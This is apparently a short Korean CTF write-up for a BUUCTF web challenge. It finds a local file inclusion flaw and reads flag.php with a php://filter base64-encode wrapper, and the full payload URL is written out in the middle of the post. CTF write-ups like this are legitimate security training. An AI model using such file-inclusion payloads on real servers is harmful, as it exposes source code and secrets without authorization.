음.. 뭔가 똥내가 킁킁

 

 

 

lfi(local file include) 취약점이 있는 페이지이다.

 

 

그럼 바로 flag.php를 가져와보면

 

얘가 나를 놀린다;

 

 

file 말고 php 스키마의 base64 encoding filter 기능을 사용해보자.

 

/secr3t.php?file=php://filter/convert.base64-encode/resource=/var/www/html/flag.php

'Web > BUUCTF' 카테고리의 다른 글

[BUUCTF] - [0CTF 2016]piapiapia1  (0) 2020.02.21
[BUUCTF] - [RoarCTF 2019]Easy Java1  (0) 2020.02.18
[BUUCTF] - [网鼎杯 2018]Fakebook1  (0) 2020.02.18
[BUUCTF] - [De1CTF 2019]SSRF Me1  (0) 2020.02.17
[BUUCTF] - [极客大挑战 2019]EasySQL1  (0) 2020.02.17

+ Recent posts